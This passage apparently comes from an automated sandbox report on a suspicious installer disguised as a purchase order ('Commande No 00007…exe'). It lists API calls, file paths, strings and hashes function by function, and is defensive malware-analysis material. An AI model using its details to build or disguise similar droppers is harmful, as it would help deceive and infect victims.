                                                        • Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                        • Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
                                                        • Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                        • Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040594A Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(?,?,00405562,?,?,00000000,00405745,?,?,?,?), ref: 0040594F
                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405963
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                        • Instruction ID: a1f521dedfcb9a291c5df24485c3a4b06dfb9301352aac2cc664dc3a40c3e92f
                                                        • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                        • Instruction Fuzzy Hash: B0D0C972908120EBC2102738AD0889BBB55EB542717058B31F865A22B0C7304C52CAA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402B07 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                        • Instruction ID: 692d63f4e87c936e9446e8fa18252424463a9f70da0c26dc4546bcf220c6e71a
                                                        • Opcode Fuzzy Hash: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                        • Instruction Fuzzy Hash: D7E08CB6250108BFDB40EFA4EE4BFA637ECFB14704F00C121BA08E7091CA78E5109B68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 908fdcaf31e4434756c9917c3feb3dae168d3dd914679bbb1a52510e135465b4
                                                        • Instruction ID: 9169326a2aec8439feca5866952fa18bd92df46eb8b4a67c681bb8a0ef40d438
                                                        • Opcode Fuzzy Hash: 908fdcaf31e4434756c9917c3feb3dae168d3dd914679bbb1a52510e135465b4
                                                        • Instruction Fuzzy Hash: CDD01277B08114E7DB00EBB9AE48A9E73A4FB50325F208637D111F11D0D3B98551EA29
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404018 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(000103F2,00000000,00000000,00000000), ref: 0040402A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                        • Instruction ID: e3adca175a6f9c0685291c658283386376a3739e196c394007d9a93dd14d7098
                                                        • Opcode Fuzzy Hash: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                        • Instruction Fuzzy Hash: 23C09B717443007BEA31CB509D49F0777587750741F5544357314F51D4C6B4F410D62D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404001 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(00000028,?,00000001,00403E32), ref: 0040400F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                        • Instruction ID: 72d9328d989bd28a4b04e8d0bfc49dcb98a3c5c69b67aa4312834a6063493829
                                                        • Opcode Fuzzy Hash: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                        • Instruction Fuzzy Hash: 54B01235685200BBEE324F00DD0DF497E72F764B02F008034B300240F0C6B300A5DB19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004031CC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                        • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00403FEE Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00403DCB), ref: 00403FF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: e35597bec60e1025900fee06943d1351a87652ae8cbe91aede0566df4541442b
                                                        • Instruction ID: ba8506c3699760f6a3e6afd6d9d514cfd718e0a5e630d9124f09760ea78015e0
                                                        • Opcode Fuzzy Hash: e35597bec60e1025900fee06943d1351a87652ae8cbe91aede0566df4541442b
                                                        • Instruction Fuzzy Hash: 73A01132808200AFCB028B00EE08C8ABF22BBA0300B02C030E200800B0CA320820FF8A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00404946 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481windowmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 0040495E
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404969
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049B3
                                                        • LoadBitmapA.USER32(0000006E), ref: 004049C6
                                                        • SetWindowLongA.USER32(?,000000FC,00404F3D), ref: 004049DF
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049F3
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A05
                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404A1B
                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A27
                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A39
                                                        • DeleteObject.GDI32(00000000), ref: 00404A3C
                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A67
                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A73
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B08
                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B33
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B47
                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404B76
                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B84
                                                        • ShowWindow.USER32(?,00000005), ref: 00404B95
                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C92
                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF7
                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D0C
                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D30
                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D50
                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404D65
                                                        • GlobalFree.KERNEL32(00000000), ref: 00404D75
                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DEE
                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404E97
                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA6
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EC6
                                                        • ShowWindow.USER32(?,00000000), ref: 00404F14
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F1F
                                                        • ShowWindow.USER32(00000000), ref: 00404F26
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $.>e$M$N
                                                        • API String ID: 1638840714-3732573515
                                                        • Opcode ID: 11184b33c8a0bad0ffedf065af9fcd562555c30c73c025eae7e35ea36ad120a5
                                                        • Instruction ID: 32328689aaf225a856d9d5e8400e1324cb9f7a0d0133e9a7d6c98aba065e8d61
                                                        • Opcode Fuzzy Hash: 11184b33c8a0bad0ffedf065af9fcd562555c30c73c025eae7e35ea36ad120a5
                                                        • Instruction Fuzzy Hash: 5D0270B0900209AFEB20DF54DD45AAE7BB5FB84315F10817AF610BA2E1D7789D42DF58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040440A Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 268stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404459
                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404483
                                                        • SHBrowseForFolderA.SHELL32(?,0041F0B8,?), ref: 00404534
                                                        • CoTaskMemFree.OLE32(00000000), ref: 0040453F
                                                        • lstrcmpiA.KERNEL32(: Completed,Stedtillgs Setup: Completed), ref: 00404571
                                                        • lstrcatA.KERNEL32(?,: Completed), ref: 0040457D
                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040458F
                                                          • Part of subcall function 004054D6: GetDlgItemTextA.USER32(?,?,00000400,004045C6), ref: 004054E9
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FA1
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FB3
                                                          • Part of subcall function 00405F49: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FC3
                                                        • GetDiskFreeSpaceA.KERNEL32(0041ECB0,?,?,0000040F,?,0041ECB0,0041ECB0,?,00000000,0041ECB0,?,?,000003FB,?), ref: 0040464A
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404665
                                                        • SetDlgItemTextA.USER32(00000000,00000400,0041ECA0), ref: 004046EB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                        • String ID: .>e$: Completed$A$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168$Stedtillgs Setup: Completed
                                                        • API String ID: 2246997448-53277146
                                                        • Opcode ID: 99c887e1a025992634fa2cd334c38f52200385e1e80dd5a9bae78a5bdda81e84
                                                        • Instruction ID: 42693497c20c2ef9f3724f7af4168125946a8ca29daa8f58ebac9689f75dac72
                                                        • Opcode Fuzzy Hash: 99c887e1a025992634fa2cd334c38f52200385e1e80dd5a9bae78a5bdda81e84
                                                        • Instruction Fuzzy Hash: B49170B1900209ABDB11AFA1CD85BAF77B8EF85314F10847BF701B62C1D77C9A418B69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040559E Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 004055C7
                                                        • lstrcatA.KERNEL32(00420CE8,\*.*,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 0040560F
                                                        • lstrcatA.KERNEL32(?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405630
                                                        • lstrlenA.KERNEL32(?,?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405636
                                                        • FindFirstFileA.KERNEL32(00420CE8,?,?,?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405647
                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F4
                                                        • FindClose.KERNEL32(00000000), ref: 00405705
                                                        Strings
                                                        • "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe", xrefs: 0040559E
                                                        • \*.*, xrefs: 00405609
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004055AC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                        • API String ID: 2035342205-1487684437
                                                        • Opcode ID: fe0f3c39c984bb9ebd9394961c36f543a8328fa7226fa6d9f9a49b85abb32e2f
                                                        • Instruction ID: f8ba85616855857cc059e9ef13111783737efc0c899630c1c9014c5665c50712
                                                        • Opcode Fuzzy Hash: fe0f3c39c984bb9ebd9394961c36f543a8328fa7226fa6d9f9a49b85abb32e2f
                                                        • Instruction Fuzzy Hash: 34510070804A04BADB21BB658D45FBF7A78DB42314F54413BF445721D2D73C8982EE6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                                        Strings
                                                        • C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine, xrefs: 004020CB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine
                                                        • API String ID: 123533781-3329137258
                                                        • Opcode ID: c8cab231879d06915c7cf320fa1d6cd04015ac96f124f4d9f47e0b6c32f70abe
                                                        • Instruction ID: 06e6b23027def8a4d5e6b724cf519ff4addaa20e67256fcdff0c37d24eef8e92
                                                        • Opcode Fuzzy Hash: c8cab231879d06915c7cf320fa1d6cd04015ac96f124f4d9f47e0b6c32f70abe
                                                        • Instruction Fuzzy Hash: EA417D71A00209BFCB00EFA4CE88E9E7BB5BF48354B2042A9F911FB2D0D6799D41DB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
